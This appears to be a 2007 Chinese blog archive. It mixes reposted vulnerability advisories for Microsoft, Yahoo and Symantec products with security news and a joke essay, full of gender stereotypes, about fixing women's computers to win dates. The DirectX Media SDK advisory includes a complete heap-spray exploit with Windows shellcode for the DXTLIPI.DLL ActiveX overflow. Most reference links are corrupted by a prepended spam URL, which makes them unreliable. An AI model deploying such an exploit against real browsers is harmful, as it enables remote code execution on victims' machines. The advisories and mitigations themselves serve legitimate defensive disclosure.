.text:10002CA9 mov [eax], cl
.text:10002CAB mov ecx, [ebp+var_4]
.text:10002CAE add eax, [edi+5Ch]
.text:10002CB1 inc esi
.text:10002CB2 inc esi
.text:10002CB3 cmp ecx, [edi+64h] ;bug is here
.text:10002CB6 jl short loc_10002C38
[edi+64h]的内容是用户提供的pic length,只要合理的构造这个值及其它相关的值,就可以成功地实现堆溢出。
<*来源:team509

链接:https://www.xfocus.net/bbs/index.php?act=ST&f=2&t=64639&page=1#entry321749
http://www.sms55.cn/reg.htmsecunia.com/advisories/26501/[/url]
http://www.sms55.cn/reg.htmwww.kb.cert.org/vuls/id/515968[/url]
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.sms55.cn/reg.htmwww.team509.com/expyahoo.rar[/url]
建议:
--------------------------------------------------------------------------------
临时解决方法:
* 限制对5100/tcp端口的访问
* 不要接受任何视频聊天请求
厂商补丁:
Yahoo!
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.sms55.cn/reg.htmmessenger.yahoo.com/[/url]


类别: 无分类 |  评论(0) |  浏览(2945) |  收藏
2007年08月30日 12:29:39

Symantec企业防火墙用户名枚举漏洞

受影响系统:
Symantec Enterprise Firewall 6.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 25338
Symantec Enterprise Firewall(SEP)是一个高性能防火墙解决方案,适用于WINDOWS和SOLARIS操作系统。
SEP在处理某种认证请求时存在漏洞,远程攻击者可能利用此漏洞暴力猜测有效的用户名。
如果对Symantec企业防火墙配置了使用预共享密钥(PSK)认证的远程访问(客户端到网关)VPN的话,就会对有效和无效用户名提供不同的响应。这就允许攻击者判断所猜测的用户名是否有效,但不会列出有效的用户名,仅可以确定所提供的用户名是否存在。
<*来源:Roy Hill

链接:http://www.sms55.cn/reg.htmwww.symantec.com/avcenter/security/Content/2007.08.16.html[/url]
http://www.sms55.cn/reg.htmsecunia.com/advisories/26511/[/url]
*>
建议:
--------------------------------------------------------------------------------
临时解决方法:
* 防火墙管理员添加default-ikeuser用户。
厂商补丁:
Symantec
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.sms55.cn/reg.htmwww.symantec.com/[/url]


类别: 无分类 |  评论(0) |  浏览(2968) |  收藏
2007年08月20日 13:35:02

给MM修电脑的三个步骤 GG们都喜欢

1、一定要打预防针 

  在修之前,向MM反复声明,这电脑鼓掌是有硬件和软件之分的,如果是硬件故障,例如显卡风扇不转了,显示器连线老化,显示器分辨率超出显示器指标,等等都会导致黑屏啊,这个我不回家用专门的工具是修不好的!

  这样一旦真的没修好,就立刻耸肩膀作无奈装:真的是硬件问题,还是送去保修吧。而MM当作硬件问题去保修,JS大人即使发现是软件问题,也会毫不犹豫作为硬件问题处理,所以决计不会有败露的麻烦

  2、重装是万能药方

  不管发生什么,只要MM同意,一律重装系统!这是最简单的方法,虽然很菜。但是如果要感动MM,这也是最好的方法,因为MM会在漫长的等待中觉得你真是很有耐心和爱心的好男人!哈哈哈哈,太阴险了,所以给恐龙修电脑,一般还是对症下药,速战速决,不要绿我,确实当恐龙看上你的时候,你就知道这不是RPWT,而是生命问题

  3、关心要无所不在

  如果选择重装,一定要反复问MM:真的可以吗?MM第一遍一般就说可以,这时候要问:没有重要的照片、文档吗?MM会犹豫,但是还是会说不要好了;这时候接着问:QQ聊天记录也会丢掉的!MM会说不要了;记着这时要作思考状,然后问:有没有重要的邮件啊,邮件也会丢掉的。一般啊,很多MM这个时候会反悔,她们就会觉得你是超级贴心人了。

  如果选择打开机箱,一定要作惊讶状!怎么这么多灰尘啊!!!(我只见过一个MM的机箱里没有灰尘的,她是实在太爱干净了)这时候MM一般都会不知道怎么回答,你立刻要作出为电脑难过的样子:这么好的电脑,灰尘太多怎么跑得快啊,散热也会受影响的,当然容易出问题了。哈哈哈哈,MM内疚的同时就会觉得你这个人特别懂得爱惜珍惜疼惜是新好男人。

  技术篇:

  1、MM电脑出的通常都是弱智问题

  所以不要用特别专业的眼光去分析,一般都是系统设置没设置好,例如曾经一个MM,帮她新配的电脑,说音箱左边的不响,过去检查,果然不响,怎么调都只有电流声,心想坏了,买到坏的了,结果不死心一看,音量控制里她全搁到右声道了,昏死!

  对于显示屏黑屏这种事情,要多看看显示器开关有没有开,显示器有没有插上电源,显示器线有没有连到主机等等问题!

  稍微高级一点,看看BIOS设定,显示器分辨率设定,对比度设定等等再高级一点,看看是不是显卡风扇停转了在有别的电脑的情况下,和别的电脑对调一下显示器看看,容易分辨是不是显示器的问题,但是要注意,要是女生寝室的话,慎用!!!因为女生寝室一般好像关系都不好,就是好也不愿意为别人的电脑奉献自己的电脑,这一点和男生寝室不一样,要鄙视一下!要想帅,带上可以外接显示器的本本去,要轻薄的,2.3kg以上就不要驮过去丢脸了

  2、要想酷、拆机箱

  不管是不是硬件问题,如果你想MM崇拜到要嫁给你的地步,记住一定要带上一根较大的十字起子,推荐电脑城装机的那种,很长很长的,超帅!我一般带上两根,一个十字头,一个一字头,一个红色有机玻璃柄,一个绿色玻璃柄,就像两把短剑,有了这两柄利器,感觉立马不一样!MM立刻觉得你就是专业的,如果MM看到后觉得害怕,别忘趁势解释一句:修的多了,随身带着方便,你的问题不一定那么大,或许用不上。MM这个时候只会希望自己的电脑坏的彻底一点,好见识你挥动长剑的潇洒身姿!哈哈哈哈,这句是丫丫而已。

  3、熟练掌握BIOS设定的窍门是看说明书

  其实很多时候问题和解决问题的方法都在BIOS设定上,例如老肯必须掌握的光驱启动,就在BIOS设定里面,这个时候万一忘记了怎么办,求助于说明书吧!!!其实在说明书中,一般都有详尽的说明,甚至包括常见问题的解决方法,只是MM们比较娇嫩,不适宜阅读这么生硬的文字罢了你的责任就是阅读它们!!!

  不要觉得临时看说明书很丢脸!如果说拆机箱可以展现你武的一面,那么你专注阅读的神情正是你展现自己文的一面最好机会!!!能文能武才是你获取MM芳心的致胜法宝,只知道挥着袖子与主板上的灰尘大战的土匪只会让MM觉得这些喜欢硬件的GG都是脏兮兮的疯子。

  而你要求获得主板、显卡及其他相关说明书最好的方法,要么就是一开始索要,一 进门就让她把她放这些东西的盒子搬出来放好;要么就是拆开机箱以后,惊讶一句:啊!这不是公版设计,我要看一下出厂时的说明书!!!甭管是什么设计,你这一句话出去,MM只会觉得你暴有水准,一眼就能看出是什么设计,其实她们也不知道什么叫公版设计母版设计的。

感情篇

  1、MM的电脑永远都是最好的

  MM一般最要面子(当然GG也要,例如老肯),但是找你修电脑总是电脑出了问题,所以你这个时候一定不能在伤口上散盐,切忌在修电脑的时候说:啊这种配置啊,该升级了。或者:这种杂牌的显卡最好不要用。或者:AOC的显示器最烂了。表以为这样可以显示你对硬件市场品牌的了解和个人的品位,这只会让MM恨死你!早期我就犯过类似口不遮拦的错误,结果有一段时间MM们电脑坏了也不敢来找我,唉,前车之鉴啊!

  对于MM的电脑,如果牌子好,哪怕是集成主板,也要说这个牌子我最喜欢了,稳定性超好,这次多半是软件问题,D版毛病就是多!(甭管她机子装的系统是不是正版,用的软件总有盗版吧)如果牌子不好,立刻说,这个牌子性价比一直就是最好的,你真会过日子!不要忘记说“你真会过日子”的时候,一定要注视MM面带百分百诚恳的微笑!!!如果真的什么都不行,就是完全该被淘汰的机子,尽量就不要说话了!!!说什么只会让场面更难堪!!!

  把电脑当作MM的脸,你就知道该怎么做了!

  2、准确把握时间 营造相遇空间

一般MM让你修电脑,如果答谢的话,一般都是请你吃饭,如果她请你吃饭的规格远远超过正常修电脑的花费,不妨检查一下电脑是否有人为破坏的因素对于不同的MM,土匪当然是有的求之不得,有的避之不及因而准确控制维修过程的时间就很重要。这里教初学者一些计算时间的方法:

  用GHOST装一个XP系统,一般是25分钟左右(如果你很熟练,20分钟内就够了)用自动方式装一个XP系统,大约是1个小时(具体没算过,如果是烂威盛主板,装 好驱动还不止)装一个OFFICE,大约还是要半个小时(这个可以在自定义里中选择,想拖延时间就全选,大概可以多争取半小时)时间还不到吃饭时间,或者时间到了吃饭时间但是你不想去,都可以通过装软件来慢慢消耗,实在不行,就卸载了多装几遍!

  当你长年累月修电脑产生厌烦心理时,推荐使用市面上的高度集成版的XP的GHOST版,一次把乱七八糟的软件都给装上了,整个时间和装一个XP干净系统也差不多,装完就走人,又快又省事如果老肯可以到这个境界的话,应该已经结婚了

  3、修理MM电脑的过程也是检查MM人品的过程

  实际上利用修电脑这一机会来泡MM的土匪,一般平时都是花了较多时间陪着自己的电脑和网友,没有太多时间和固定场所(例如大学自修室、英语角或者公共社交场所)接触真实MM的人。很多这方面的高手也都是成功地在修好电脑的同时弥补了自己姻缘的缺憾,顺利找到另一半!但是并不是所有的相遇都是美满的结局,这除了土匪个人的RPWT,主要还在于他们在修理电脑的时候没有注意MM们的RPWT。给出一些个人建议:

  如果MM只会站在一边看着你修,连杯水都不给你倒,除非她年纪太小太不懂事,不然这样的MM基本不懂关心照顾别人,也不懂尊重别人的劳动和付出。这样的MM若不是超级大美女,还是算了!

  如果MM会一直问这问那,特别是如果主要问你为什么要这样修的原因,这种MM不够重视分工,喜欢主导一切,不能够尊重权威和相信理性,娶回家只会让你多一个唠唠叨叨的监工。如果你不喜欢被人呼来唤去,没有自疟倾向,这种MM还是算了!

  如果MM一直问你要不要喝水,要不要歇一会儿,还问一些和修电脑无关的情况,例如问你这么好的技术都怎么学来的啊,如果殷勤到一反常态的地步,恭喜你!这个MM想泡你!!!如果这个MM一贯对人热情,那么这种MM属于擅长公关,有很强的管理和组织能力,这种MM也会成为未来家中的主管,但是好在是一种以人为本的管理,你不至于太痛苦这样的MM,只要平时不是那种过分往上爬巴结领导的类型,实际上还算不错的选择

  如果MM话并不多,默默地给你倒杯水,然后再一旁看着,不时跑过来帮你递东西,这种是贤妻良母型,是那种甘愿在背后默默支持你的类型,你要是事业主导型的土匪,毫不犹豫泡这个MM吧!!!极品赞不绝口。(就是恐龙也不妨考虑一下)

  如果MM给你东西吃,证明对你不见外;从来没见过的MM话,证明对你很有好感!小子,你赚了!

  MM站着看你修电脑,有座位不坐,离得近的是关心电脑!离得远的还站着,如果不是眼睛超好的那种,这种MM有同甘共苦的意识,一般富有同情心,比较爱国(自己到时候对照一下)

  MM坐着看你修电脑,正常;MM坐着但是不看你,眼光会游移到别的地方或者做自己的小动作,死了心吧!她已经有意中人了!

  MM躺着看你修电脑(还真的有!)遇到的都是和我太熟悉的才这样!第一次就这样没遇到过,真有的话,就是RPWT!!!

  MM在你修电脑的时候去洗澡了(遇到一次!)这个MM如果不是三天没洗澡,那就是把你当成家人看待了,我觉得关系很熟这样的话就不算什么;如果第一次就这样,建议逃走或者躺下!!!

  MM修电脑的时候把父母介绍给你(到她家修电脑)或者给你看她存在电脑上家人的照片,她很希望成为你重要的朋友。

  MM修电脑的时候把MM介绍给你,电脑其实没问题,这个MM觉得你人不错,肥水不流外人田,便宜自己的姐妹先??。

类别: 无分类 |  评论(0) |  浏览(3860) |  收藏
2007年08月20日 12:59:52

Gartner警告:Web 2.0将带来巨大安全风险


赛迪网
【赛迪网讯】8月17日消息,据外电报道,市场研究公司Gartner最近发表的研究报告称,Web 2.0技术将带来“巨大的安全风险”。企业应该重新检查其IT安全框架并且尽早采取行动限制这种风险。
Gartner副总裁和研究员Joseph Feiman在声明中说,Web 2.0的许多概念与传统的IT安全做法是矛盾的。他是指如何使用Web 2.0服务需要用户更多的参与,相应地需要企业解除一些限制允许用户更有效地使用这些服务。
Feiman说,这种挑战将产生入网的威胁,如RSS传输中的恶意代码进入企业网络等。他说,还有一种风险,就是通过不适当的博客和协作网站的共享泄漏信息。
Feiman说,限制这种风险的一个方法就是,在建立Web 2.0应用的时候,企业应该采用安全开发生命周期并且把重点放在验证所有的输入方面,无论这种输入是来自内部用户还是商业合作伙伴。

类别: 无分类 |  评论(0) |  浏览(3999) |  收藏
2007年08月20日 12:59:25

德国反黑客法出炉 拥有黑客工具非法

cnbeta.com
如果你是一名计算机安全研究人员并且有写代码的爱好,那么德国不适合你去。早前,德国通过了“反黑客”法律,现在这部法律已经生效了。为了避免被起诉,有些安全网站已经重新安置或者关闭了。
代号为“202c”的这部新法律禁止传播和拥有以对安全措施侵害为首要目的的软件。德国最早并且最大的黑客组织之一The Chaos Computer Club称禁止这种软件大概同禁止铁锤的销售和制造一样有帮助,因为有时,它们也造成破坏。
目前还不完全清楚这部新法律如何实施,但是一些开发人员正在采取一些谨慎的方法。KisMAC,对Mac OS进行无线嗅探和破解的软件在七月末迎来了最黑暗的一天,一名主要开发人员宣布退出KisMAC的开发。KisMAC的官方网站给访客留下了这样的政治性指控的话“一个世界上大的出口国禁止安全软件的生产和传播(StGB §202c),从一个诗人和思想家的国家变成了一个官僚和不学无术者的国家。”
然而,KisMAC还会继续。这个网站誓言将很快转移到一家荷兰的服务器上,把服务器重新安置到其他国家看起来可能是一个流行的作法。 Phenoelit,一个发布安全开发和拥有非常多的默认密码的组织已经把所有的资料转移到了一家美国服务器上,因为“根据新法律,拥有黑客工具是非法的。”
幸运的是,对于德国无聊的黑客来说,交换文件仍是仅有的“不足取的犯罪”。


类别: 无分类 |  评论(0) |  浏览(4055) |  收藏
2007年08月20日 12:58:45

联合国宣布采取措施 重视防御黑客攻击

eNet硅谷动力

  【eNet硅谷动力消息】针对星期天官方网站被黑客入侵,网页上出现反美和反以色列信息事件的发生,联合国周一声称,它已经采取措施来防止黑客再次入侵到其官方网站。
  联合国秘书长的女发言人Michele Montas表示,“预防措施已经采取,不会再发生类似事件。”
  她说,“我们非常关注这件事情的发生,迅速采取行动,来防止对我们计算机系统的侵害,新闻部与信息技术安全部一起来防止今后此类事件的再次发生。”
  网站用于发布联合国秘书长潘基文最新声明的网页在周日出现的信息是,“非法闯入者凯雷姆/这是网上抗议/以色列和美国不要杀害儿童和其他人/永久和平/不要战争。”
  这个信息也出现在平常用来显示联合国秘书长讲话的其它网页上,但是在星期天的上午9:15(格林威治时间13:15)联合国网站的这个信息就被删除了。
  联合国还在调查黑客,但是被问到这次事件是否被认为是网络恐怖主义时,Michele Montas回答说,“我不知道,我想它更像是一个恶作剧。”


类别: 无分类 |  评论(0) |  浏览(3740) |  收藏
2007年08月20日 12:58:10

黑客批Mac OSX 攻破它像用它那么容易

cnbeta

Charles Miller,在黑帽大会之前刚刚攻破了iPhone的安全研究人员再次对苹果发难,他认为Mac OS中隐藏着不少严重的安全问题,“黑客攻破它就像使用它那么容易”。
在一次主题为“Hacking Leopard:Tools and techniques for attacking the newest Mac OS X,”20分钟的短暂报告里,Miller列举出了Mac OS中50个以上的root下跑的程序,包含Locum,NetCfgTool,TimeZoneSettingTool在内的工具都可以为黑客带来可乘之机。
另一方面,Safari,Address Book,Finder,iChat,Script Editor,iTunes,Dictionary,Help Viewer,iCal,Keynote,Mail,iPhoto,QuickTime Player,Sherlock,Terminal,BOMArchiveHelper,Preview和DiskImageMounter等程序都包含着大量的问题,一些旧版本的攻击代码在网上流传许久,他认为攻击者或渠道这些资源以后搞定一台Mac非常容易。


类别: 无分类 |  评论(0) |  浏览(4254) |  收藏
2007年08月20日 12:56:51

微软发布9款补丁软件 普通用户成黑客攻击目标


CNET科技资讯网
CNET科技资讯网8月15日国际报道 本周二,微软发布了9款补丁软件,其中包括4款可以阻止通过Web网页攻击计算机的补丁软件。
微软对这4个补丁软件的危险程度评级为“危急”。这些补丁软件影响多个版本的Windows、Server、Office,其中包括Windows XP和Windows Vista,它们能够阻止黑客利用特别设计的网页攻击用户的计算机。
其它二个危急缺陷修正了Excel和让用户察看从电子邮件或社交网络站点上下载图像的技术中的漏洞。
微软对另外3款补丁软件的危险程度评级是“重要”。
尽管微软将Windows Vista称作是其有史以来最安全的操作系统,但本周二发布的一款“重要”补丁软件修正了“gadgets”中的一个缺陷。
另外2款补丁软件修正了Windows Media Player和让用户运行多个“虚拟”计算机的软件中的缺陷。
安全厂商Qualys缺陷研究实验室的经理阿默尔说,黑客越来越多地将Web看作是攻击普通用户计算机的一种途径。目前,利用图像文件、媒体播放器皮肤、gadgets的基于Web的攻击已经成为一种新的攻击渠道。
阿默尔表示,大公司的信息技术员工正在越来越熟悉安全知识,黑客将目光越来越地瞄准了普通用户,利用他们对安全的忽视对他们发动攻击,并在计算机上安装恶意软件,窃取用户的密码和信用卡号码。
Windows用户可以访问微软的安全网站获得这些补丁软件,或配置他们的计算机,自动地安装每个月的补丁软件。


类别: 无分类 |  评论(0) |  浏览(4154) |  收藏
2007年08月20日 12:56:23

Microsoft Vista侧栏联系人及天气小工具远程代码执行漏洞

受影响系统:
Microsoft Windows Vista
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 25306,25304
CVE(CAN) ID: CVE-2007-3891,CVE-2007-3032

Vista是微软发布的最新的操作系统。

Vista侧栏的联系人和天气小工具在解析某些属性时没有执行充分的验证,远程攻击者可能利用此漏洞通过诱使用户执行某些操作来控制系统。

如果用户在联系人小工具中导入添加了恶意的联系人文件,或单击了天气小工具中的恶意链接,就可能导致在系统上运行恶意代码。

<*来源:Aviv Raff (avivra@gmail.com

链接:http://www.sms55.cn/reg.htmsecunia.com/advisories/26439/[/url]
http://www.sms55.cn/reg.htmwww.microsoft.com/technet/security/Bulletin/MS07-048.mspx?pf=true[/url]
http://www.sms55.cn/reg.htmwww.us-cert.gov/cas/techalerts/TA07-226A.html[/url]
*>

建议:
--------------------------------------------------------------------------------
临时解决方法:

* 卸载或禁用天气和联系人小工具
* 在“组策略”或注册表中禁用侧栏
* 修改gadget.xml上的访问控制列表以增加限制:

1. 依次单击“开始”、“所有程序”、“附件”,右键单击“命令提示符”,选择“以管理员身份运行”,然后单击“继续”。
2. 在命令提示符处键入以下命令:
cd %ProgramFiles%\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US
3. 在命令提示符处键入以下命令。记下文件上的当前ACL(包括继承设置),以便将来撤消此修改时作为参考:
takeown /f gadget.xml
4. 在命令提示符处键入以下命令以调用源标题小工具的ACL。 记下文件上的当前ACL(包括继承设置),以便将来撤消此修改时作为参考:
cacls gadget.xml /deny Everyone:(R,RX)
5. 应用此临时解决方案后,必须注销系统或关闭sidebar.exe进程。

厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS07-048)以及相应补丁:
MS07-048:Vulnerabilities in Windows Gadgets Could Allow Remote Code Execution (938123)
链接:http://www.sms55.cn/reg.htmwww.microsoft.com/technet/security/Bulletin/MS07-048.mspx?pf=true[/url]

补丁下载:
http://www.sms55.cn/reg.htmwww.microsoft.com/downloads/details.aspx?displaylang=zh-cn&FamilyID=49a5bd84-da71-4529-b4d3-ac57dab59e01[/url]
http://www.sms55.cn/reg.htmwww.microsoft.com/downloads/details.aspx?FamilyId=24443f59-b908-480b-9b72-7094d4b5e128[/url]



类别: 无分类 |  评论(0) |  浏览(3984) |  收藏
2007年08月20日 12:55:54

Microsoft Vista侧栏RSS源小工具跨站脚本漏洞

受影响系统:

Microsoft Windows Vista

描述:

--------------------------------------------------------------------------------

BUGTRAQ ID: 25287

CVE(CAN) ID: CVE-2007-3033

Vista是微软发布的最新的操作系统。

Vista侧栏中的RSS源小工具中存在漏洞,远程攻击者可能利用此漏洞导致跨站脚本执行。

在解析RSS源中的某些单元时,可能会渲染单元中特制的HTML标签,导致注入JavaScript脚本。由于RSS源小工具是在本地区域中运行的,因此所注入的脚本可以获得对系统的完全访问。

<*来源:Joshua J. Drake



链接:http://www.sms55.cn/reg.htmsecunia.com/advisories/26439/[/url]

http://www.sms55.cn/reg.htmwww.microsoft.com/technet/security/Bulletin/MS07-048.mspx?pf=true[/url]

http://www.sms55.cn/reg.htmwww.us-cert.gov/cas/techalerts/TA07-226A.html[/url]

http://www.sms55.cn/reg.htmlabs.idefense.com/intelligence/vulnerabilities/display.php?id=575[/url]

*>

建议:

--------------------------------------------------------------------------------

临时解决方法:

* 卸载或禁用源标题小工具

* 在“组策略”或注册表中禁用侧栏

* 修改gadget.xml上的访问控制列表以增加限制:



1. 依次单击“开始”、“所有程序”、“附件”,右键单击“命令提示符”,选择“以管理员身份运行”,然后单击“继续”。

2. 在命令提示符处键入以下命令:

cd %ProgramFiles%\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US

3. 在命令提示符处键入以下命令。记下文件上的当前ACL(包括继承设置),以便将来撤消此修改时作为参考:

takeown /f gadget.xml

4. 在命令提示符处键入以下命令以调用源标题小工具的ACL。 记下文件上的当前ACL(包括继承设置),以便将来撤消此修改时作为参考:

cacls gadget.xml /deny Everyone:(R,RX)

5. 应用此临时解决方案后,必须注销系统或关闭sidebar.exe进程。

厂商补丁:

Microsoft

---------

Microsoft已经为此发布了一个安全公告(MS07-048)以及相应补丁:

MS07-048:Vulnerabilities in Windows Gadgets Could Allow Remote Code Execution (938123)

链接:http://www.sms55.cn/reg.htmwww.microsoft.com/technet/security/Bulletin/MS07-048.mspx?pf=true[/url]

补丁下载:

http://www.sms55.cn/reg.htmwww.microsoft.com/downloads/details.aspx?displaylang=zh-cn&FamilyID=49a5bd84-da71-4529-b4d3-ac57dab59e01[/url]

http://www.sms55.cn/reg.htmwww.microsoft.com/downloads/details.aspx?FamilyId=24443f59-b908-480b-9b72-7094d4b5e128[/url]





类别: 无分类 |  评论(0) |  浏览(4015) |  收藏
2007年08月20日 12:55:25

Microsoft Virtual PC/Virtual Server堆溢出漏洞

受影响系统:
Microsoft Virtual PC for Mac 7版
Microsoft Virtual PC for Mac 6.1版
Microsoft Virtual PC 2004 SP1
Microsoft Virtual PC 2004
Microsoft Virtual Server 2005标准版
Microsoft Virtual Server 2005企业版
Microsoft Virtual Server 2005 R2标准版
Microsoft Virtual Server 2005 R2企业版
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 25298
CVE(CAN) ID: CVE-2007-0948
Microsoft Virtual PC和Virtual Server都是流行的虚拟机工具,允许在同一台计算机上运行多个操作系统。
Microsoft Virtual PC和Microsoft Virtual Server中存在权限提升漏洞,这可能允许对虚拟机操作系统拥有管理员权限的用户在主机操作系统或其他虚拟机操作系统上运行代码。
对虚拟机操作系统拥有管理员权限的攻击者可以通过在虚拟机操作系统上运行特制代码来利用此漏洞,导致在主机或其虚拟机操作系统上出现堆溢出。成功利用此漏洞的攻击者可以完全控制受影响的系统。
<*来源:Rafal Wojtczuk

链接:http://www.sms55.cn/reg.htmsecunia.com/advisories/26444/[/url]
http://www.sms55.cn/reg.htmwww.microsoft.com/technet/security/Bulletin/MS07-049.mspx[/url]
http://www.sms55.cn/reg.htmwww.us-cert.gov/cas/techalerts/TA07-226A.html[/url]
*>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS07-049)以及相应补丁:
MS07-049:Vulnerability in Virtual PC and Virtual Server Could Allow Elevation of Privilege (937986)
链接:http://www.sms55.cn/reg.htmwww.microsoft.com/technet/security/Bulletin/MS07-049.mspx[/url]


类别: 无分类 |  评论(0) |  浏览(4022) |  收藏
2007年08月20日 12:54:37

Microsoft IE pdwizard.ocx ActiveX控件远程代码执行漏洞

受影响系统:
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.01
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 25295
CVE(CAN) ID: CVE-2007-3041
Internet Explorer是微软发布的非常流行的WEB浏览器。
IE的pdwizard.ocx控件实现上存在漏洞,远程攻击者可能利用此漏洞控制用户系统。
pdwizard.ocx控件中存在内存破坏漏洞,如果用户受骗使用IE访问了恶意站点的话就可能导致执行任意代码。成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限,那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。
<*来源:Microsoft

链接:http://www.sms55.cn/reg.htmsecunia.com/advisories/26419/[/url]
http://www.sms55.cn/reg.htmwww.microsoft.com/technet/security/Bulletin/MS07-045.mspx?pf=true[/url]
http://www.sms55.cn/reg.htmwww.us-cert.gov/cas/techalerts/TA07-226A.html[/url]
*>
建议:
--------------------------------------------------------------------------------
临时解决方法:
* 将Internet Explorer配置为在Internet和本地Intranet安全区域中运行ActiveX控件之前进行提示

* 将Internet 和本地Intranet安全区域设置设为“高”,以便在这些区域中运行ActiveX控件和活动脚本之前进行提示
* 禁止在Internet Explorer中运行COM对象
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS07-045)以及相应补丁:
MS07-045:Cumulative Security Update for Internet Explorer (937143)
链接:http://www.sms55.cn/reg.htmwww.microsoft.com/technet/security/Bulletin/MS07-045.mspx?pf=true[/url]


类别: 无分类 |  评论(0) |  浏览(3745) |  收藏
2007年08月20日 12:54:01

Microsoft Excel rtWnDesk记录内存破坏漏洞(MS07-044)

受影响系统:
Microsoft Excel Viewer 2003
Microsoft Office XP SP3
Microsoft Office 2004 for Mac
Microsoft Office 2003 Service Pack 2
Microsoft Office 2000 SP3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 25280
CVE(CAN) ID: CVE-2007-3890
Microsoft Excel是微软Office套件中的电子表格工具。
Excel在处理畸形格式的文档时存在漏洞,远程攻击者可能利用此漏洞通过诱使用户处理恶意文件控制用户系统。
Excel没有正确地验证rtWnDesk记录中的索引值,如果用户受骗打开了特制的Excel Workspace(XLW)文件的话,就可以触发内存破坏,导致执行任意指令。
<*来源:Carsten Eiram

链接:http://www.sms55.cn/reg.htmsecunia.com/advisories/26145/[/url]
http://www.sms55.cn/reg.htmwww.microsoft.com/technet/security/Bulletin/MS07-044.mspx?pf=true[/url]
http://www.sms55.cn/reg.htmwww.us-cert.gov/cas/techalerts/TA07-226A.html[/url]
*>
建议:
--------------------------------------------------------------------------------
临时解决方法:
* 使用Microsoft Office文件阻断策略禁止打开不可信任来源和位置的Office 2003及更早版本文档:

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\FileOpenBlock]
"BinaryFiles"=dword:00000001.
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS07-044)以及相应补丁:
MS07-044:Vulnerability in Microsoft Excel Could Allow Remote Code Execution (940965)
链接:http://www.sms55.cn/reg.htmwww.microsoft.com/technet/security/Bulletin/MS07-044.mspx?pf=true[/url]

类别: 无分类 |  评论(0) |  浏览(4300) |  收藏
2007年08月20日 12:53:29

Microsoft DirectX Media SDK DXTLIPI.DLL控件远程栈溢出漏洞

受影响系统:

Microsoft DirectX Media SDK 6.0

描述:

--------------------------------------------------------------------------------

BUGTRAQ ID: 25255

CVE(CAN) ID: CVE-2007-3872

DirectX Media SDK是用于开发流媒体应用程序的工具包。

DirectX Media SDK捆绑的ActiveX控件实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。

DirectX Media SDK捆绑了一个由Live Picture公司提供的第三方ActiveX控件FlashPix(DXTLIPI.DLL),该控件在处理SourceUrl()属性时存在缓冲区溢出,如果用户受骗打开了恶意网页并传送了超过大约1044字节的超长字符串的话,就可能触发这个溢出,导致执行任意指令。

<*来源:Krystian Kloskowski (h07@interia.pl)



链接:http://www.sms55.cn/reg.htm谢谢支持www.kb.cert.org/vuls/id/466601

http://www.sms55.cn/reg.htm谢谢支持secunia.com/advisories/26426/

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<HTML>

<!--

Microsoft DXMedia SDK 6 "SourceUrl" ActiveX 0day Remote Code Execution Exploit

Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>

Tested on:..

- Microsoft DirectX Media 6.0 SDK

- Microsoft Internet Explorer 6 + all patches

- Microsoft Windows XP SP2 Polish + all patches

Details:..

obj.SourceUrl = "AAAA..1044..AAAA";

location.reload();

[Module DXTLIPI]

EAX 41414141

CALL DWORD PTR DS:[EAX]

-->

<object id="obj" classid="clsid:201EA564-A6F6-11D1-811D-00C04FB6BD36"></object>

<script>

var shellcode = unescape("%u9090%u9090"+ //Windows Execute Command (calc)

"%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+

"%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca"+

"%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b"+

"%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040"+

"%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0"+

"%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a"+

"%u685f%ufe98%u0e8a%uff57%u63e7%u6c61%u0063");

var address = 0x0D0D0D0D;

var block_size = 0x400000;

var blocks = (address - block_size) / block_size;

var spray = unescape("%u0D0D%u0D0D");

var tmp = "\x0D\x0D\x0D\x0D";

var tmp_size = 1044;

while((spray.length * 2) < block_size) spray += spray;

spray = spray.substring(0, block_size - shellcode.length);

memory = new Array();

for(i = 0; i < blocks; i++) memory = spray + shellcode;

while(tmp.length < (tmp_size * 2)) tmp += tmp;

tmp = tmp.substring(0, tmp_size);

obj.SourceUrl = tmp;

location.reload();

</script>

</HTML>

建议:

--------------------------------------------------------------------------------

临时解决方法:

* 在IE中禁用FlashPix ActiveX控件,为以下CLSID设置kill bit:

{201EA564-A6F6-11D1-811D-00C04FB6BD36}

或者将以下文本保存为.REG文件并导入:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{201EA564-A6F6-11D1-811D-00C04FB6BD36}]

